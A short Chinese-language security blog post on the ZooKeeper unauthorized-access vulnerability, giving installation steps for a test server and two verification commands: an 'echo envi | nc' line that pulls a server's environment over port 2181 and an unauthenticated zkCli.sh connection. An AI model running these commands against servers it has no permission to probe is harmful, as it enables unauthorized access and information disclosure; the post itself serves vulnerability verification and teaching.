ZooKeeper 未授权访问漏洞
ZooKeeper 安装:
Zookeeper的默认开放端口是2181
wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz tar -zxvf zookeepre-3.4.10.tar.gz cd zookeeper-3.4.10/ cd conf/ vi zoo.cfg ###配置单机模式 tickTime=2000 dataDir=/tmp/zookeeper/data dataLogDir=/tmp/zookeeper/logs clientPort=2181 bin/zkServer.sh start //启动 #启动client连接server bin/zkCli.sh -server localhost:2181
漏洞验证:
执行以下命令即可远程获取该服务器的环境:
echo envi|nc 192.168.15.74 2181
直接连接:
./zkCli.sh -server ip:port
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
参考链接:
Zookeeper 安装和配置
http://coolxing.iteye.com/blog/1871009
本文由Bypass整理发布,转载请保留出处。
欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。